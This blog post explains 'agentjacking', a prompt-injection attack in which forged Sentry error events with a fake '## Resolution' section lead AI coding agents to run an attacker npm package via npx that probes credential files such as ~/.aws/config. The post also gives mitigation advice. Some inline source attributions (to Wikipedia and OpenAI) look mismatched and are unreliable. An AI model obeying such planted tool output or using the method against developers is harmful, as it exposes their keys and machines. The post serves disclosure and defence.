← All PostsAgentjacking: A Fake Bug Report Runs Code on Your Machine
securityAI toolsdeveloper tools

Agentjacking: A Fake Bug Report Runs Code on Your Machine

June 14, 2026

Agentjacking is a new attack class that hijacks AI coding agents by planting fake commands inside Sentry error events — no breach required, no stolen credentials, nothing your EDR or firewall will flag. Researchers at Tenet Security published the full disclosure on June 9, 2026, showing that a single crafted HTTP POST using a public Sentry DSN is enough to make Claude Code, Cursor, or Codex execute arbitrary shell code on your machine with your own privileges. Wikipedia

If you use any of these agents with Sentry connected via MCP, read this before your next debugging session.

Key Takeaways

  • The attack requires only a target's public Sentry DSN — findable in any website's JavaScript source
  • It works against Claude Code, Cursor, and Codex with an 85% success rate in testing
  • 2,388 organisations confirmed exposed in Tenet's scan
  • EDR, firewalls, IAM, and VPNs all miss it — every step is technically authorised
  • Sentry declined to fix it at the root level; the underlying risk remains

What Is Agentjacking?

Agentjacking is an attack technique that exploits the implicit trust AI coding agents place in MCP tool responses. When a developer asks their AI agent to investigate Sentry errors, the agent queries Sentry via MCP and receives the injected event. The agent cannot distinguish a legitimate Sentry error from an attacker-crafted one — and treats the attacker's instructions as authoritative system output. Wikipedia

The result: the agent runs whatever command the attacker planted, on your machine, using your credentials, as part of your normal workflow.

How the Attack Chain Works

The attack has six steps, and every single one is technically authorised — which is why no security control catches it. Wikipedia

Step 1 — DSN discovery. A Sentry DSN is a public, write-only credential that Sentry intentionally documents as safe to embed in frontend JavaScript. Attackers find it by inspecting any website's source, running Censys searches, or using GitHub code search. No breach needed. Wikipedia

Step 2 — Event injection. The attacker POSTs a crafted error event to Sentry's ingest endpoint. No authentication beyond the DSN is required. Sentry accepts it with HTTP 200 and processes it identically to a legitimate application error. Wikipedia

Step 3 — Markdown injection. The injected event contains carefully formatted markdown in the message field and context key names. When the Sentry MCP server returns this to an AI agent, the markdown renders as structured content — headings, code blocks, and tables visually identical to Sentry's own system templates. The injected content includes a fake ## Resolution section with an npx command. Wikipedia

Step 4 — Agent manipulation. When a developer asks their agent to fix unresolved Sentry issues, the agent queries Sentry via MCP and receives the injected event. The agent is steered away from investigating source code and toward executing the suggested diagnostic tool. Wikipedia

Step 5 — Code execution. The agent runs npx @attacker-package --diagnose. The package downloads from npm and executes with the developer's full privileges.

Step 6 — Exfiltration. The package probes environment variables, checks file sizes of ~/.aws/config, ~/.npmrc, and ~/.docker/config.json, and scans network interfaces for VPN detection. AWS keys, GitHub tokens, private repo URLs — all reachable. Wikipedia

Why Nothing Catches It

Tenet calls this the Authorised Intent Chain: the prevailing security model is built to catch unauthorised behaviour, and this attack contains none. Only public Sentry ingest APIs were used. No system was breached, no authentication was bypassed, and no vulnerability was exploited in Sentry itself. Cyber Security News

The attack slips past EDR, firewalls, IAM, and VPNs because nothing in the chain is unauthorised. Prompt hardening doesn't help either — agents ran the injected code even when explicitly told to ignore untrusted data. OpenAI

This is the same trust-inversion pattern we've seen in LLM agent attacks on Marimo and the AI database deletion incident — agents with broad permissions acting on untrusted input they can't distinguish from legitimate system data. The attack surface keeps expanding as MCP connects agents to more tools.

What Sentry Said

Tenet disclosed the findings to Sentry on June 3, 2026. Sentry acknowledged the issue but leadership declined to implement a root-cause fix, describing the attack class as "technically not defensible" at the platform level. Aguidetocloud

Sentry introduced a global content filter for one specific payload string — the one used in Tenet's proof-of-concept — and deferred mitigation to model vendors. Any attacker who changes a few words bypasses the filter. The structural problem is untouched. Wikipedia

What You Can Do Right Now

No patch closes this completely, but you can reduce your exposure significantly:

  1. Audit your MCP connections. If your coding agent has Sentry connected via MCP, decide whether that integration needs to exist. Remove what isn't actively used.
  2. Restrict agent permissions. Don't let your agent run arbitrary npx or npm exec commands without a confirmation step. Most agents support approval gates for shell execution — enable them.
  3. Treat MCP-sourced content as untrusted. Any data flowing into your agent from an external tool can be poisoned. Review what tools your agent reads from and who can write to those tools.
  4. Rotate credentials if you've been running agents against Sentry. If Claude Code or Cursor has been autonomously resolving Sentry issues and your DSN is public, assume exposure and rotate your AWS keys, npm tokens, and GitHub credentials.
  5. Watch for unexpected npx invocations in your shell history. If your agent ran a package you didn't recognise, treat it as a compromise.

The Bigger Problem

Agentjacking proves that as the AI agent ecosystem expands through MCP integrations, observability platforms can be weaponised as command-and-control channels. The flaw isn't in Sentry alone — the same risk runs through support tickets, GitHub issues, and documentation. OpenAI Help Center

Any external surface your agent reads from is now a potential injection point. If fake Claude Code installers were one threat vector for stolen API keys, agentjacking is the inside-out version — your legitimate agent becomes the delivery mechanism.

The defence has to live at the agent runtime level. Until model vendors implement mandatory sandboxing and untrusted-content labelling for MCP responses, treat every MCP-connected tool as a potential attack surface.

FAQ

What is agentjacking?

Agentjacking is an attack technique where an attacker injects malicious commands into a data source that an AI coding agent reads — such as a Sentry error event — causing the agent to execute attacker-controlled code on the developer's machine. It requires no breach of the target's systems, only a publicly available Sentry DSN credential.

Which AI coding agents are affected by agentjacking?

Tenet Security's research confirmed the attack works against Claude Code, Cursor, and Codex, with an 85% success rate across all three in controlled testing. Any AI coding agent that reads from a Sentry MCP server is potentially vulnerable to the same technique.

How do attackers find a target's Sentry DSN?

Sentry DSNs are public, write-only credentials embedded in frontend JavaScript by design. Attackers can find them by inspecting a website's source code, running Censys queries for Sentry ingest subdomains, or searching GitHub's public code index — no hacking required.

Has Sentry patched agentjacking?

Sentry acknowledged the issue but declined to fix it at the root level, describing it as "technically not defensible" at the platform. A content filter was applied to block one specific proof-of-concept payload string. The underlying vulnerability in how MCP-connected agents trust event data remains unaddressed.

How do I protect my AI coding agent from agentjacking?

Restrict your agent's ability to run arbitrary shell commands without approval, remove MCP connections to Sentry if not actively needed, rotate any credentials (AWS keys, GitHub tokens, npm tokens) that your agent has had access to, and monitor shell history for unexpected npx invocations. Treat all MCP-sourced content as untrusted input.

Sources: Tenet Security — Original Research, The Hacker News, The Next Web, Infosecurity Magazine